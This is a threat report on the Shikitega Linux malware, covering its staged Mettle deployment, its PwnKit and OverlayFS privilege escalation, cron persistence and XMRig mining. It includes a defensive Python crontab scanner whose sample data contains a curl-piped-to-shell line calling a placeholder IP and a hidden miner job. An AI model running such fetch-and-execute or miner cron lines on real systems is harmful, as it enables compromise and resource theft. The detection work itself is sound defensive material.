Shikitega: New Malware Targets Linux Systems

By Anthony Eich on September 19, 2022

Executive Summary

Shikitega is the moniker given to a new malware payload that targets Linux operating systems. The attack can take control of many different Linux distributions, not just those built for servers and desktop computers. Smaller IoT (internet of things) devices are also vulnerable and are less likely to have defenses capable of blocking the attacks [1]. The vector for initial infection is still being investigated, but it is known that once the initial Executable and Linkable Format (ELF) file is installed, the Mettle Meterpreter tool from Metasploit is used to install additional minute segments of code that are virtually undetectable by signature-based anti-virus solutions. When the multi-stage exploits are in place, the crontab command is executed to use the cron utility in Linux operating systems to further obfuscate the scheduled execution of a crypto mining tool, XMRig version 6.17.0. The machines are then essentially added to a botnet that is being used for cryptocurrency mining, and its command and control (C2) servers are being discovered all over the world [4]. With such a widely exploitable footprint, the possibility for this malware to spread to a great number of networks is extremely high.
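As an added example (not code from the report, nor the malware's own code), a defender-side hunt over crontab entries for the kind of cron persistence described above; the heuristics, the host address, the paths and the sample crontab are all constructed for illustration, not indicators taken from the report:

```python
import re

# Heuristics are assumptions for illustration, not indicators from the report.
SUSPECT_DIR = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/|/\.[A-Za-z0-9_-]+/")  # scratch or dot-directory
REMOTE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")    # download piped straight into a shell
MINER_NAME = re.compile(r"xmrig|minerd|stratum\+tcp", re.IGNORECASE)
SCHEDULE_FIELDS = 5  # minute hour day-of-month month day-of-week

def parse_crontab_line(line):
    """Return the command part of a crontab line, or None for blank, comment and VAR= lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"[A-Za-z_][A-Za-z0-9_]*=", stripped):
        return None
    if stripped.startswith("@"):  # @reboot, @hourly, ... use a single schedule field
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) > 1 else ""
    parts = stripped.split(None, SCHEDULE_FIELDS)
    return parts[SCHEDULE_FIELDS] if len(parts) > SCHEDULE_FIELDS else ""

def scan_crontab(text):
    """Return (line_no, command, reasons) for every job that trips at least one heuristic."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        command = parse_crontab_line(line)
        if command is None:
            continue
        reasons = []
        if SUSPECT_DIR.search(command):
            reasons.append("runs from a temporary or hidden path")
        if REMOTE_TO_SHELL.search(command):
            reasons.append("pipes downloaded content into a shell")
        if MINER_NAME.search(command):
            reasons.append("references a known miner")
        if reasons:
            findings.append((line_no, command, reasons))
    return findings

# Constructed sample crontab; host, paths and file names are made up for the example.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/bin:/bin
0 2 * * * /usr/bin/apt-get update
*/5 * * * * /tmp/.x/rt > /dev/null 2>&1
@reboot curl -s http://198.51.100.7/s.sh | sh
30 * * * * /home/svc/.cache/xmrig --config=/home/svc/.cache/c.json
"""

if __name__ == "__main__":
    for line_no, command, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {command!r} -> {', '.join(reasons)}")
```

On a live host the same function can be fed the output of `crontab -l` for each user and the contents of /etc/cron.d, which is where cron-based persistence of this kind would show up.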

Background

The latest malware to target Linux operating systems, dubbed Shikitega, uses the Mettle Meterpreter from the popular penetration testing software Metasploit to infect target machines in a multi-step payload methodology. Once installed, the malware gives the attackers full control over the Linux device by exploiting two known vulnerabilities. CVE-2021-4034, known as PwnKit, allows for the execution of commands as another user [3][5]. The other exploit being deployed is CVE-2021-3493 (OverlayFS), which takes advantage of a kernel vulnerability that allows unprivileged overlay mounts, leading to elevated privileges [2][9]. As the malware propagates, each stage is designed to dig deeper into the system, continue to escalate privileges, and add persistence. Once established, the malware communicates with C2 (command and control) servers that are also lightweight [1][4]. Often the C2 servers discovered are virtual instances hosted on legitimate cloud services such as GCP (Google Cloud Platform) and AWS (Amazon Web Services). The malware often goes undetected because its engineering design employs polymorphic encoding, which obfuscates the data being transmitted in a way that does not set off alarms in intrusion detection systems and anti-virus programs. The ultimate payload of this malware is a cryptocurrency miner, showing that those responsible for this malware have an ultimate goal of financial gain. However, in the process of turning infected machines into mining zombies, those in control of the C2 will also have the ability to execute attacks such as webcam controls, sniffers, various reverse shells, shell commands, process controls, and more.

[Figure: Shikitega ELF overview diagram, from [4]]

Impact

Because the malware uses Mettle to deploy, which uses very few resources, it is capable of infecting the smallest Linux instances, such as those used to run firmware on IoT (internet of things) devices. This makes most modern networks that are not properly safeguarded by firewalls, endpoint protection, proper configuration, and anti-intrusion mechanisms extremely vulnerable. Just one IoT device on an insecure network, such as a thermostat or security camera, can be infected by this malware, which can then leave other devices on the network vulnerable to further attacks. The impact of this malware could have ongoing repercussions if the holes that allow for the transmission and execution of the malicious payload are not closed. Home networks, private industry, military, and government alike are all in one form or another using Linux operating systems. Since Linux operating systems all behave very similarly, the Shikitega malware is likely to be a long-standing threat to networks of varying size and security designations.

Significance

Since Shikitega can infect not just laptops and typical operating systems, but also devices running lightweight instances of Linux, the malware can infect almost any network that is not defended properly. Its ability to spread to a vast number of devices means that its transmission and spread could make it one of the most prolific Linux malware payloads seen to date. To put this in perspective, Linux powers about 85% of all smartphones in use today [6]. That footprint alone should be enough to warrant a high level of concern regarding this malware. That does not include higher computing capacity endpoints such as servers and desktop/laptop computers, and even virtual machines. All these devices are vulnerable to the Shikitega malware. While the intention of the malware is to create a botnet used for cryptocurrency mining, there is clearly an opportunity to alter the payload in many ways. The spying capabilities alone are enough to cause a massive amount of damage if the C2 servers switched tactics to data exfiltration or ransomware. Also, since Linux updates are not pushed out as often or as automatically as on other operating systems, it is highly likely that many Linux systems will remain unsecured for a longer period of time. The best practice, as always, is to update systems as soon as possible and, where necessary, manually configure operating systems to close the holes that can be exploited by the threat actors responsible for this latest exploit.

References

[1] Arghire, I. (2022, September 8). New ‘Shikitega’ Linux Malware Grabs Complete Control of Infected Systems. Retrieved September 15, 2022, from securityweek.com: https://www.securityweek.com/new-shikitega-linux-malware-grabs-complete-control-infected-systems

[2] CVE-2021-3493 Detail. (2021, December 16). Retrieved September 15, 2022, from nvd.nist.gov: https://nvd.nist.gov/vuln/detail/CVE-2021-3493

[3] CVE-2021-4034 Detail. (2022, June 14). Retrieved September 15, 2022, from nvd.nist.gov: https://nvd.nist.gov/vuln/detail/cve-2021-4034

[4] Goodin, D. (2022, September 9). New Linux malware combines unusual stealth with a full suite of capabilities. Retrieved September 15, 2022, from arstechnica.com: https://arstechnica.com/information-technology/2022/09/new-linux-malware-combines-unusual-stealth-with-a-full-suite-of-capabilities/

[5] Ilascu, I. (2022, January 25). Linux system service bug gives root on all major distros, exploit released. Retrieved September 15, 2022, from bleepingcomputer.com: https://www.bleepingcomputer.com/news/security/linux-system-service-bug-gives-root-on-all-major-distros-exploit-released/

[6] Ivan. (2022, May 25). Linux Statistics. Retrieved September 15, 2022, from truelist.co: https://truelist.co/blog/linux-statistics/

[7] Maury, J. (2022, September 14). New Linux Malware Shikitega Can Take Full Control of Devices. Retrieved September 15, 2022, from esecurityplanet.com: https://www.esecurityplanet.com/threats/new-linux-malware-takes-full-control-of-devices/

[8] rapid7/mettle. (n.d.). Retrieved September 15, 2022, from github.com: https://github.com/rapid7/mettle

[9] Toulas, B. (2022, September 6). New Linux malware evades detection using multi-stage deployment. Retrieved September 15, 2022, from bleepingcomputer.com: https://www.bleepingcomputer.com/news/security/new-linux-malware-evades-detection-using-multi-stage-deployment/